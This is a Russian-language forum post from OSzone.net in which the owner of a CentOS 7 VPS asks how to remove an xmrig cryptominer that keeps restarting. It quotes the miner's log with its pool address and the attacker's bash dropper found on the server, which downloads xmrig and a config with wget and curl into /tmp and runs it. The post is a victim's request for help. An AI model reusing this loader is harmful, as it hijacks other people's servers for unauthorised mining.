Имя пользователя:
Пароль:  
Помощь | Регистрация | Забыли пароль?  | Правила  

Компьютерный форум OSzone.net » Linux и FreeBSD » Общий по Linux » Redhat/Fedora - Centos xmrig

Ответить
Настройки темы
Redhat/Fedora - Centos xmrig

Старожил


Сообщения: 412
Благодарности: 3

Профиль | Отправить PM | Цитировать


Изменения
Автор: kot488
Дата: 25-01-2022
Гуру, нужна помощь, имеет vps в аренде на centos 7. На него установлено битрикс веб окружение. Начал замечать что машина тупит, посмотрет через htop, а там процесс xmrig грузит проц. Гугл подсказал что это майнер. Пароли пробовла менять не помогает, ранее помогало убить процесс и тишина на неделю, сейчас после того как убил процесс он опять запускается. В tmp есть файлы xmrig и config.json. Ограничел доступа по ssh только с определенных IP. Как вычестить эту нечисть?
Вот кусок лога который достал
Скрытый текст
* ABOUT XMRig/6.16.2 gcc/9.3.0
* LIBS libuv/1.42.0 OpenSSL/1.1.1l hwloc/2.5.0
* HUGE PAGES supported
* 1GB PAGES disabled
* CPU Intel(R) Xeon(R) CPU E3-1225 v5 @ 3.30GHz (1) 64-bit AES
L2:1.0 MB L3:8.0 MB 4C/4T NUMA:1
* MEMORY 13.1/15.4 GB (85%)
* DONATE 1%
* ASSEMBLY auto:intel
* POOL #1 193.29.56.190:443 algo auto
* POOL #2 193.29.56.190:3333 algo auto
* COMMANDS hashrate, pause, resume, results, connection
[2022-01-22 20:10:41.043] config configuration saved to: "/tmp/config.json"
[2022-01-22 20:10:41.149] net use pool 193.29.56.190:443 TLSv1.3 193.29.56.190
[2022-01-22 20:10:41.149] net fingerprint (SHA-256): "506847d9aff6c44cae3744081278ffee45cf4f372a86e490eb816209ecd52f19"
[2022-01-22 20:10:41.149] net new job from 193.29.56.190:443 diff 5256K algo rx/0 height 2542932 (14 tx)
[2022-01-22 20:10:41.149] cpu use argon2 implementation AVX2
[2022-01-22 20:10:41.167] msr cannot read MSR 0x000001a4
[2022-01-22 20:10:41.167] msr FAILED TO APPLY MSR MOD, HASHRATE WILL BE LOW
[2022-01-22 20:10:41.167] randomx init dataset algo rx/0 (4 threads) seed bfeb43ae90807dc3...
[2022-01-22 20:10:41.185] randomx allocated 2336 MB (2080+256) huge pages 11% 128/1168 +JIT (18 ms)
[2022-01-22 20:10:46.004] randomx dataset ready (4820 ms)
[2022-01-22 20:10:46.005] cpu use profile rx (4 threads) scratchpad 2048 KB
[2022-01-22 20:10:46.007] cpu READY threads 4/4 (4) huge pages 100% 4/4 memory 8192 KB (2 ms)
[2022-01-22 20:10:59.198] net new job from 193.29.56.190:443 diff 5256K algo rx/0 height 2542933 (18 tx)
[2022-01-22 20:11:31.030] net new job from 193.29.56.190:443 diff 5256K algo rx/0 height 2542934 (12 tx)
[2022-01-22 20:11:37.396] net new job from 193.29.56.190:443 diff 5289K algo rx/0 height 2542935 (4 tx)
[2022-01-22 20:11:42.695] net new job from 193.29.56.190:443 diff 5289K algo rx/0 height 2542936 (4 tx)
[2022-01-22 20:11:46.060] miner speed 10s/60s/15m 1479.1 n/a n/a H/s max 1491.6 H/s
[2022-01-22 20:12:46.109] miner speed 10s/60s/15m 1463.9 1462.4 n/a H/s max 1491.6 H/s
[2022-01-22 20:13:46.169] miner speed 10s/60s/15m 1491.8 1468.5 n/a H/s max 1491.8 H/s
[2022-01-22 20:14:46.229] miner speed 10s/60s/15m 1479.5 1464.3 n/a H/s max 1491.8 H/s
[2022-01-22 20:14:46.865] net new job from 193.29.56.190:443 diff 5256K algo rx/0 height 2542937 (18 tx)
[2022-01-22 20:15:46.229] miner speed 10s/60s/15m 1463.6 1450.9 n/a H/s max 1491.8 H/s
[2022-01-22 20:16:46.289] miner speed 10s/60s/15m 1460.0 1472.3 n/a H/s max 1491.8 H/s


А вот пошоже нашел запуск файла
Скрытый текст
#!/bin/bash
if [ -f /tmp/xmrig -a -f /tmp/config.json ]; then

echo "xmrig&config.json status yes"

else
cd /tmp
wget -P /tmp https://github.com/xmrig/xmrig/relea...tic-x64.tar.gz
curl -o /tmp/config.json https://cdn.sql.gg/TiWRtJXktxmJnpUYV...Tc/config.json
tar -zxvf /tmp/xmrig-6.16.2-linux-static-x64.tar.gz
mv /tmp/xmrig-6.16.2/xmrig /tmp/xmrig
chmod 777 /tmp/xmrig
rm -rf /tmp/xmrig-6.16.2
rm -rf /tmp/xmrig-6.16.2-linux-static-x64.tar.gz
echo "xmrig&config.json status no loading"
fi

ps -fe|grep ./xmrig |grep -v grep
if [ $? -ne 0 ]
then
echo "start process....."
cd /tmp
./xmrig
else
echo "runing....."
fi


Пока в хосте прописал левый IP для github.com и cdn.sql.gg и снес файлы которыми запускался процесс

Отправлено: 12:08, 25-01-2022

 


Компьютерный форум OSzone.net » Linux и FreeBSD » Общий по Linux » Redhat/Fedora - Centos xmrig

Участник сейчас на форуме Участник сейчас на форуме Участник вне форума Участник вне форума Автор темы Автор темы Шапка темы Сообщение прикреплено

Похожие темы
Название темы Автор Информация о форуме Ответов Последнее сообщение
Прочее - CentOS 7 nikitos435 Общий по Linux 2 04-01-2022 21:36
2008 R2 - Hyper-V + CentOS 6.7 Udar_Nick Windows Server 2008/2008 R2 8 13-01-2016 15:55
Redhat/Fedora - CentOS 7 Ruldik Общий по Linux 2 16-09-2015 06:54
Redhat/Fedora - Centos начало ~user~ Общий по Linux 2 13-09-2012 22:37
Redhat/Fedora - centOS gateway Proflex Общий по Linux 2 27-02-2012 15:45




 
Переход